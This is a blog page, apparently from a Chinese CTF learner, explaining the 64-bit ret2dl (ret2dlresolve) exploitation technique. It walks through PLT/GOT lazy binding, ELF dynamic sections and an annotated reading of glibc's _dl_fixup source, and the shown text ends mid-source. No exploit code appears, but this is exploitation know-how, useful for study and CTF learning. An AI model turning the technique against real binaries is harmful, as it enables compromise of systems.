<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="ScUpax0s" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="TaLpwn-learning-ret2dl-64.md    &#x2F;* https:&#x2F;&#x2F;github.com&#x2F;microsoft&#x2F;vscode&#x2F;blob&#x2F;master&#x2F;extensions&#x2F;markdown-language-features&#x2F;media&#x2F;markdown.css *&#x2F; &#x2F;*----------------------------------------------------">
<meta property="og:type" content="article">
<meta property="og:title" content="TaLpwn-learning-ret2dl-64_tmp">
<meta property="og:url" content="http://yoursite.com/2020/06/13/TaLpwn-learning-ret2dl-64_tmp/index.html">
<meta property="og:site_name" content="ScUpax0s">
<meta property="og:description" content="TaLpwn-learning-ret2dl-64.md    &#x2F;* https:&#x2F;&#x2F;github.com&#x2F;microsoft&#x2F;vscode&#x2F;blob&#x2F;master&#x2F;extensions&#x2F;markdown-language-features&#x2F;media&#x2F;markdown.css *&#x2F; &#x2F;*----------------------------------------------------">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/10/t70ca8.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/10/t70LiF.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/10/t7DzE6.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/t7sey9.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/t76sqs.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/t76hzF.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/t7gFB9.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tHDPq1.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tHrf1g.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tHsoxe.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tH6mkt.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tHWJJI.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tbs9ot.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tbqwNV.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/11/tbqWAx.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvPj1g.jpg">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tviI8U.jpg">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvF5dI.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvk16e.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvkvcD.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvAyvD.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/06/13/tvAWVA.png">
<meta property="article:published_time" content="2020-06-13T07:01:50.255Z">
<meta property="article:modified_time" content="2020-06-13T07:01:50.303Z">
<meta property="article:author" content="Paxos">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2020/06/10/t70ca8.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/06/13/TaLpwn-learning-ret2dl-64_tmp/"/>





  <title>TaLpwn-learning-ret2dl-64_tmp | ScUpax0s</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ScUpax0s</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/06/13/TaLpwn-learning-ret2dl-64_tmp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Paxos">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://avatars2.githubusercontent.com/u/48941180?s=460&u=c99ae53e7dd15c30c6283cc36edb2f8825ce8aec&v=4">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ScUpax0s">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">TaLpwn-learning-ret2dl-64_tmp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-06-13T15:01:50+08:00">
                2020-06-13
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <!DOCTYPE html>
<html>
<head>
<title>TaLpwn-learning-ret2dl-64.md</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">

<style>
/* https://github.com/microsoft/vscode/blob/master/extensions/markdown-language-features/media/markdown.css */
/*---------------------------------------------------------------------------------------------
 *  Copyright (c) Microsoft Corporation. All rights reserved.
 *  Licensed under the MIT License. See License.txt in the project root for license information.
 *--------------------------------------------------------------------------------------------*/

body {
	font-family: var(--vscode-markdown-font-family, -apple-system, BlinkMacSystemFont, "Segoe WPC", "Segoe UI", "Ubuntu", "Droid Sans", sans-serif);
	font-size: var(--vscode-markdown-font-size, 14px);
	padding: 0 26px;
	line-height: var(--vscode-markdown-line-height, 22px);
	word-wrap: break-word;
}

#code-csp-warning {
	position: fixed;
	top: 0;
	right: 0;
	color: white;
	margin: 16px;
	text-align: center;
	font-size: 12px;
	font-family: sans-serif;
	background-color:#444444;
	cursor: pointer;
	padding: 6px;
	box-shadow: 1px 1px 1px rgba(0,0,0,.25);
}

#code-csp-warning:hover {
	text-decoration: none;
	background-color:#007acc;
	box-shadow: 2px 2px 2px rgba(0,0,0,.25);
}

body.scrollBeyondLastLine {
	margin-bottom: calc(100vh - 22px);
}

body.showEditorSelection .code-line {
	position: relative;
}

body.showEditorSelection .code-active-line:before,
body.showEditorSelection .code-line:hover:before {
	content: "";
	display: block;
	position: absolute;
	top: 0;
	left: -12px;
	height: 100%;
}

body.showEditorSelection li.code-active-line:before,
body.showEditorSelection li.code-line:hover:before {
	left: -30px;
}

.vscode-light.showEditorSelection .code-active-line:before {
	border-left: 3px solid rgba(0, 0, 0, 0.15);
}

.vscode-light.showEditorSelection .code-line:hover:before {
	border-left: 3px solid rgba(0, 0, 0, 0.40);
}

.vscode-light.showEditorSelection .code-line .code-line:hover:before {
	border-left: none;
}

.vscode-dark.showEditorSelection .code-active-line:before {
	border-left: 3px solid rgba(255, 255, 255, 0.4);
}

.vscode-dark.showEditorSelection .code-line:hover:before {
	border-left: 3px solid rgba(255, 255, 255, 0.60);
}

.vscode-dark.showEditorSelection .code-line .code-line:hover:before {
	border-left: none;
}

.vscode-high-contrast.showEditorSelection .code-active-line:before {
	border-left: 3px solid rgba(255, 160, 0, 0.7);
}

.vscode-high-contrast.showEditorSelection .code-line:hover:before {
	border-left: 3px solid rgba(255, 160, 0, 1);
}

.vscode-high-contrast.showEditorSelection .code-line .code-line:hover:before {
	border-left: none;
}

img {
	max-width: 100%;
	max-height: 100%;
}

a {
	text-decoration: none;
}

a:hover {
	text-decoration: underline;
}

a:focus,
input:focus,
select:focus,
textarea:focus {
	outline: 1px solid -webkit-focus-ring-color;
	outline-offset: -1px;
}

hr {
	border: 0;
	height: 2px;
	border-bottom: 2px solid;
}

h1 {
	padding-bottom: 0.3em;
	line-height: 1.2;
	border-bottom-width: 1px;
	border-bottom-style: solid;
}

h1, h2, h3 {
	font-weight: normal;
}

table {
	border-collapse: collapse;
}

table > thead > tr > th {
	text-align: left;
	border-bottom: 1px solid;
}

table > thead > tr > th,
table > thead > tr > td,
table > tbody > tr > th,
table > tbody > tr > td {
	padding: 5px 10px;
}

table > tbody > tr + tr > td {
	border-top: 1px solid;
}

blockquote {
	margin: 0 7px 0 5px;
	padding: 0 16px 0 10px;
	border-left-width: 5px;
	border-left-style: solid;
}

code {
	font-family: Menlo, Monaco, Consolas, "Droid Sans Mono", "Courier New", monospace, "Droid Sans Fallback";
	font-size: 1em;
	line-height: 1.357em;
}

body.wordWrap pre {
	white-space: pre-wrap;
}

pre:not(.hljs),
pre.hljs code > div {
	padding: 16px;
	border-radius: 3px;
	overflow: auto;
}

pre code {
	color: var(--vscode-editor-foreground);
	tab-size: 4;
}

/** Theming */

.vscode-light pre {
	background-color: rgba(220, 220, 220, 0.4);
}

.vscode-dark pre {
	background-color: rgba(10, 10, 10, 0.4);
}

.vscode-high-contrast pre {
	background-color: rgb(0, 0, 0);
}

.vscode-high-contrast h1 {
	border-color: rgb(0, 0, 0);
}

.vscode-light table > thead > tr > th {
	border-color: rgba(0, 0, 0, 0.69);
}

.vscode-dark table > thead > tr > th {
	border-color: rgba(255, 255, 255, 0.69);
}

.vscode-light h1,
.vscode-light hr,
.vscode-light table > tbody > tr + tr > td {
	border-color: rgba(0, 0, 0, 0.18);
}

.vscode-dark h1,
.vscode-dark hr,
.vscode-dark table > tbody > tr + tr > td {
	border-color: rgba(255, 255, 255, 0.18);
}

</style>

<style>
/* Tomorrow Theme */
/* http://jmblog.github.com/color-themes-for-google-code-highlightjs */
/* Original theme - https://github.com/chriskempson/tomorrow-theme */

/* Tomorrow Comment */
.hljs-comment,
.hljs-quote {
	color: #8e908c;
}

/* Tomorrow Red */
.hljs-variable,
.hljs-template-variable,
.hljs-tag,
.hljs-name,
.hljs-selector-id,
.hljs-selector-class,
.hljs-regexp,
.hljs-deletion {
	color: #c82829;
}

/* Tomorrow Orange */
.hljs-number,
.hljs-built_in,
.hljs-builtin-name,
.hljs-literal,
.hljs-type,
.hljs-params,
.hljs-meta,
.hljs-link {
	color: #f5871f;
}

/* Tomorrow Yellow */
.hljs-attribute {
	color: #eab700;
}

/* Tomorrow Green */
.hljs-string,
.hljs-symbol,
.hljs-bullet,
.hljs-addition {
	color: #718c00;
}

/* Tomorrow Blue */
.hljs-title,
.hljs-section {
	color: #4271ae;
}

/* Tomorrow Purple */
.hljs-keyword,
.hljs-selector-tag {
	color: #8959a8;
}

.hljs {
	display: block;
	overflow-x: auto;
	color: #4d4d4c;
	padding: 0.5em;
}

.hljs-emphasis {
	font-style: italic;
}

.hljs-strong {
	font-weight: bold;
}
</style>

<style>
/*
 * Markdown PDF CSS
 */

 body {
	font-family: -apple-system, BlinkMacSystemFont, "Segoe WPC", "Segoe UI", "Ubuntu", "Droid Sans", sans-serif, "Meiryo";
	padding: 0 12px;
}

pre {
	background-color: #f8f8f8;
	border: 1px solid #cccccc;
	border-radius: 3px;
	overflow-x: auto;
	white-space: pre-wrap;
	overflow-wrap: break-word;
}

pre:not(.hljs) {
	padding: 23px;
	line-height: 19px;
}

blockquote {
	background: rgba(127, 127, 127, 0.1);
	border-color: rgba(0, 122, 204, 0.5);
}

.emoji {
	height: 1.4em;
}

code {
	font-size: 14px;
	line-height: 19px;
}

/* for inline code */
:not(pre):not(.hljs) > code {
	color: #C9AE75; /* Change the old color so it seems less like an error */
	font-size: inherit;
}

/* Page Break : use <div class="page"/> to insert page break
-------------------------------------------------------- */
.page {
	page-break-after: always;
}

</style>

<script src="https://unpkg.com/mermaid/dist/mermaid.min.js"></script>
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
  <script>
    mermaid.initialize({
      startOnLoad: true,
      theme: document.body.classList.contains('vscode-dark') || document.body.classList.contains('vscode-high-contrast')
          ? 'dark'
          : 'default'
    });
  </script>
<p><s>当时没做出来的一道题，赛后再静下心研究一下，ret2dl 64位模版题，一瞬把我秒了。。</s></p>
<h2 id="%E4%BB%80%E4%B9%88%E6%98%AFret2dl%E6%94%BB%E5%87%BB">什么是ret2dl攻击</h2>
<ul>
<li>当程序在第一次加载某个函数的时候，got表中对应的表项还没有写入真实的地址（因为是第一次调用），所以这个时候就需要调用<code>_dl_runtime_resolve</code>函数将真实的地址写入got表对应的表项中，然后将控制权交还这个函数，此时就完成了第一次的调用，got表中也有了对应的真实地址。</li>
</ul>
<h2 id="%E6%95%B4%E4%B8%AA%E8%B0%83%E7%94%A8%E8%BF%87%E7%A8%8B%E6%A2%B3%E7%90%86">整个调用过程梳理</h2>
<h3 id="dlfixup%E4%B9%8B%E5%89%8D">_dl_fixup之前</h3>
<ul>
<li>当我们第一调用read时，他的跳转过程是<code>read@plt -&gt; read@got -&gt; read@plt -&gt; plt[0] -&gt; _dl_runtime_resolve_xsave -&gt; _dl_fixup</code><img src="https://s1.ax1x.com/2020/06/10/t70ca8.png" alt="">我们可以再看一下0x4004e0到底是什么。<img src="https://s1.ax1x.com/2020/06/10/t70LiF.png" alt="">已知 &lt;read@plt&gt;  是plt中的第一个函数，那么0x4004e0就是plt[0]即plt的首项。这里对应两条汇编，第一条实际上做了一个push操作，他负责将一个参数压栈。这里需要实际解释一下：在<code>_dl_runtime_resolve_xsave</code>中实际调用了<code>_dl_fixup</code>而忽略掉宏定义，这个函数是:<pre class="hljs"><code><div>    <span class="hljs-comment">/* This function is called through a special trampoline from the PLT the
    first time each PLT entry is called.  We must perform the relocation
    specified in the PLT of the given shared object, and return the resolved
    function address to the trampoline, which will restart the original call
    to that address.  Future calls will bounce directly from the PLT to the
    function.  */</span>

    DL_FIXUP_VALUE_TYPE
    attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
    _dl_fixup (struct link_map *l, ElfW(Word) reloc_arg)
</div></code></pre>
</li>
</ul>
<p>可以看到一共有两个参数：<code>struct link_map *l, ElfW(Word) reloc_arg</code>，然后我们再回过来看刚刚的代码，<strong>其实两个push就是做了参数压栈</strong>：<img src="https://s1.ax1x.com/2020/06/10/t7DzE6.png" alt=""></p>
<h3 id="dlfixup%E8%BF%9B%E5%85%A5%E4%BB%A5%E5%90%8E">_dl_fixup进入以后</h3>
<ul>
<li>嗯这、这里是关键，我们一步步分析一下<code>_dl_fixup</code>源代码。在这之前，我们先要研究一下几个重要的section和段。</li>
</ul>
<h4 id="dynamic">.dynamic</h4>
<p><img src="https://s1.ax1x.com/2020/06/11/t7sey9.png" alt="">.dynamic是动态链接中非常重要和经典的一个段。首先看一下<code>ELF64_Dyn</code>的结构如下：</p>
<pre class="hljs"><code><div><span class="hljs-comment">// 该结构都有 64 位程序和 32 位程序的区别，不过大致结构相似，此处只讨论 64 位程序中的</span>
<span class="hljs-comment">// /usr/include/elf.h</span>
<span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span>
{</span>
Elf64_Sxword d_tag; <span class="hljs-comment">/* Dynamic entry type */</span>
<span class="hljs-comment">// d_tag 识别该结构体表示的哪一个节，通过以此字段不同来寻找不同的节</span>
    <span class="hljs-keyword">union</span>
    {
        Elf64_Xword d_val; <span class="hljs-comment">/* Integer value */</span>
        <span class="hljs-comment">// 对应节的地址，用于存储该结构体表示下的节所在的地址</span>
        Elf64_Addr d_ptr; <span class="hljs-comment">/* Address value */</span>
    } d_un;

} Elf64_Dyn;
</div></code></pre>
<p>而在.dynamic之中有几个<strong>重要的section如下</strong>：</p>
<table>
<thead>
<tr>
<th>d_tag类型</th>
<th>d_un含义</th>
</tr>
</thead>
<tbody>
<tr>
<td>DT_SYMTAB</td>
<td>动态链接<strong>符号表的地址</strong>，d_ptr指向&quot;.dynsym&quot;的地址</td>
</tr>
<tr>
<td>DT_STRTAB</td>
<td>动态链接<strong>字符串表的地址</strong> ，d_ptr指向&quot;.dynstr&quot;的地址</td>
</tr>
<tr>
<td>DT_JMPREL</td>
<td>动态链接<strong>重定位表的信息</strong>，d_ptr指向&quot;.rel.plt&quot;地址</td>
</tr>
<tr>
<td>DT_VERSYM</td>
<td>.gnu.version的节的位置</td>
</tr>
</tbody>
</table>
<h4 id="dynsym">.dynsym</h4>
<p><img src="https://s1.ax1x.com/2020/06/11/t76sqs.png" alt="">
其中，ELF64_Sym结构体为：</p>
<pre class="hljs"><code><div><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span>
{</span>
Elf64_Word st_name; <span class="hljs-comment">/* Symbol name (string tbl index) */</span>
<span class="hljs-comment">// 保存着该函数函数名在 .dynstr 中的偏移，可以结合 .dynstr 找到准确函数名。</span>
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> st_info; <span class="hljs-comment">/* Symbol type and binding */</span>
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> st_other; <span class="hljs-comment">/* Symbol visibility */</span>
Elf64_Section st_shndx; <span class="hljs-comment">/* Section index */</span>
Elf64_Addr st_value; <span class="hljs-comment">/* Symbol value */</span>
<span class="hljs-comment">// 如果这个符号被导出，则存有这个导出函数的虚拟地址，否则为NULL.</span>
Elf64_Xword st_size; <span class="hljs-comment">/* Symbol size */</span>
} Elf64_Sym;
</div></code></pre>
<h4 id="dynstr">.dynstr</h4>
<p><img src="https://s1.ax1x.com/2020/06/11/t76hzF.png" alt=""></p>
<h4 id="relplt">.rel.plt</h4>
<p><img src="https://s1.ax1x.com/2020/06/11/t7gFB9.png" alt="">
其中，ELF64_Rela结构体为：</p>
<pre class="hljs"><code><div><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
           Elf64_Addr r_offset; <span class="hljs-comment">//保存的是应用重定位操作的偏移量。对于一个重定位文件，这个值是从节开始到受重定位影响的存储单元的偏移量。对于一个可执行或共享目标文件，这个值是受重定位影响的存储单元的虚拟地址。</span>
           <span class="hljs-keyword">uint64_t</span>   r_info;   <span class="hljs-comment">//This member gives both the symbol table index with respect to which the relocation must be made and the type of relocation to apply. </span>
           <span class="hljs-keyword">int64_t</span>    r_addend; <span class="hljs-comment">//指定了一个附加的常数用来去计算保存在重定位位置的值。</span>
       } Elf64_Rela; 
</div></code></pre>
<h4 id="linkmap%E7%BB%93%E6%9E%84">link_map结构</h4>
<pre class="hljs"><code><div><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span>
  {</span>
    ElfW(Addr) l_addr;                <span class="hljs-comment">/* Base address shared object is loaded at.  */</span>
    <span class="hljs-keyword">char</span> *l_name;                     <span class="hljs-comment">/* Absolute file name object was found in.  */</span>
    ElfW(Dyn) *l_ld;                  <span class="hljs-comment">/* Dynamic section of the shared object.  */</span>
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span> *<span class="hljs-title">l_next</span>, *<span class="hljs-title">l_prev</span>;</span> <span class="hljs-comment">/* Chain of loaded objects.  */</span>
    <span class="hljs-comment">//省略，后面还有很多</span>
  };
</div></code></pre>
<h4 id="dptr%E5%AE%8F">D_PTR宏</h4>
<pre class="hljs"><code><div><span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> DL_RO_DYN_SECTION</span>
<span class="hljs-meta"># <span class="hljs-meta-keyword">define</span> D_PTR(map, i) ((map)-&gt;i-&gt;d_un.d_ptr + (map)-&gt;l_addr)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span>
<span class="hljs-meta"># <span class="hljs-meta-keyword">define</span> D_PTR(map, i) (map)-&gt;i-&gt;d_un.d_ptr</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>
</div></code></pre>
<h4 id="elfw%E5%AE%8F">ELFW宏</h4>
<pre class="hljs"><code><div><span class="hljs-comment">/* We use this macro to refer to ELF macros independent of the native
   wordsize.  `ELFW(R_TYPE)' is used in place of `ELF32_R_TYPE' or
   `ELF64_R_TYPE'.  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> ELFW(type)	_ElfW (ELF, __ELF_NATIVE_CLASS, type)</span>
</div></code></pre>
<h4 id="dlfixupmakevalue%E5%AE%8F">DL_FIXUP_MAKE_VALUE宏</h4>
<pre class="hljs"><code><div><span class="hljs-comment">/* Construct a value of type DL_FIXUP_VALUE_TYPE from a code address
   and a link map.  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> DL_FIXUP_MAKE_VALUE(map, addr) (addr)</span>
</div></code></pre>
<h4 id="symboladdress%E5%AE%8F">SYMBOL_ADDRESS宏</h4>
<pre class="hljs"><code><div><span class="hljs-comment">/* Calculate the address of symbol REF using the base address from map MAP,
   if non-NULL.  Don't check for NULL map if MAP_SET is TRUE.  */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> SYMBOL_ADDRESS(map, ref, map_set)				\
  ((ref) == NULL ? 0							\
   : (__glibc_unlikely ((ref)-&gt;st_shndx == SHN_ABS) ? 0			\
      : LOOKUP_VALUE_ADDRESS (map, map_set)) + (ref)-&gt;st_value)</span>
</div></code></pre>
<h4 id="lookupvalueaddress%E5%AE%8F">LOOKUP_VALUE_ADDRESS宏</h4>
<pre class="hljs"><code><div><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LOOKUP_VALUE_ADDRESS(map, set) ((set) || (map) ? (map)-&gt;l_addr : 0)</span>
</div></code></pre>
<h4 id="elfmachinefixupplt%E5%87%BD%E6%95%B0">elf_machine_fixup_plt函数</h4>
<pre class="hljs"><code><div><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Addr)</span>
<span class="hljs-title">elf_machine_fixup_plt</span> <span class="hljs-params">(struct link_map *<span class="hljs-built_in">map</span>, <span class="hljs-keyword">lookup_t</span> t,
		       <span class="hljs-keyword">const</span> ElfW(Sym) *refsym, <span class="hljs-keyword">const</span> ElfW(Sym) *sym,
		       <span class="hljs-keyword">const</span> ElfW(Rela) *reloc,
		       ElfW(Addr) *reloc_addr, ElfW(Addr) value)</span>
</span>{
  <span class="hljs-keyword">return</span> *reloc_addr = value;
}
</div></code></pre>
<h4 id="x86-64%E4%B8%8B%E5%AF%B9%E4%BA%8Erelocarg%E7%9A%84%E7%89%B9%E6%AE%8Adefine">x86-64下对于reloc_arg的特殊define</h4>
<pre class="hljs"><code><div><span class="hljs-comment">/* The ABI calls for the PLT stubs to pass the index of the relocation
   and not its offset.  In _dl_profile_fixup and _dl_call_pltexit we
   also use the index.  Therefore it is wasteful to compute the offset
   in the trampoline just to reverse the operation immediately
   afterwards.  此时的reloc_arg类似于一个数组下标 */</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> reloc_offset reloc_arg * sizeof (PLTREL)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> reloc_index  reloc_arg</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;elf/dl-runtime.c&gt;</span></span>
</div></code></pre>
<h4 id="dlfixup%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB">_dl_fixup源码阅读</h4>
<pre class="hljs"><code><div><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> ELF64_R_SYM(i)            ((i) &gt;&gt; 32)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> ELF64_R_TYPE(i)            ((i) &amp; 0xffffffff)</span>

<span class="hljs-comment">/*这里由于我们是64位下的，请看：x86-64下对于reloc_arg的特殊define*/</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">ifndef</span> reloc_offset</span>
<span class="hljs-meta"># <span class="hljs-meta-keyword">define</span> reloc_offset reloc_arg</span>
<span class="hljs-meta"># <span class="hljs-meta-keyword">define</span> reloc_index  reloc_arg / sizeof (PLTREL)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>

DL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
	   ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
	   struct link_map *l, ElfW(Word) reloc_arg
)

{
  <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Sym)</span> *<span class="hljs-keyword">const</span> symtab
    </span>= (<span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *) D_PTR (l, l_info[DT_SYMTAB]);  
    <span class="hljs-comment">//通过指向linkmap找到DT_SYMTAB，进而得到.dynsym地址，存在symtab里。</span>
    <span class="hljs-comment">//查找过程：l -&gt; linkmap -&gt; DT_SYMTAB -&gt; .dynsym</span>
    <span class="hljs-comment">//其中l指向linkmap，d_tag类型为DT_SYMTAB时，d_ptr指向.dynsym</span>

  <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *strtab 
   = (<span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *) D_PTR (l, l_info[DT_STRTAB]);
    <span class="hljs-comment">//拿到.dynstr地址</span>

  <span class="hljs-keyword">const</span> PLTREL *<span class="hljs-keyword">const</span> reloc
    = (<span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
    <span class="hljs-comment">//reloc_offset就是reloc_arg</span>
    <span class="hljs-comment">//将.rel.plt地址与reloc_offset相加，得到函数所对应的Elf64_Rel指针，记作reloc </span>

  <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Sym)</span> *sym 
   </span>= &amp;symtab[ELFW(R_SYM) (reloc-&gt;r_info)];
    <span class="hljs-comment">//将(reloc-&gt;r_info)&gt;&gt;32作为.dynsym下标，得到函数所对应的Elf64_Sym指针，记作sym</span>


  <span class="hljs-function"><span class="hljs-keyword">const</span> <span class="hljs-title">ElfW</span><span class="hljs-params">(Sym)</span> *refsym </span>= sym;
  <span class="hljs-keyword">void</span> *<span class="hljs-keyword">const</span> rel_addr = (<span class="hljs-keyword">void</span> *)(l-&gt;l_addr + reloc-&gt;r_offset);
    <span class="hljs-comment">//l-&gt;l_addr 加载共享对象的基本地址</span>
    <span class="hljs-comment">//l-&gt;l_addr + reloc-&gt;r_offset即为需要修改的got表地址。</span>
 

  <span class="hljs-keyword">lookup_t</span> result;
  DL_FIXUP_VALUE_TYPE value;

  <span class="hljs-comment">/* Sanity check that we're really looking at a PLT relocation.  */</span>
  <span class="hljs-comment">/* 检查r_info最低为是不是7 */</span>
  <span class="hljs-comment">/* ELFW(TYPE)是用来代替 Elf32_TYPE 或 Elf64_TYPE*/</span>
  <span class="hljs-comment">/* ELF_MACHINE_JMP_SLOT=7 有兴趣可以自己看源码在：glibc/latest/source/elf/elf.h */</span>
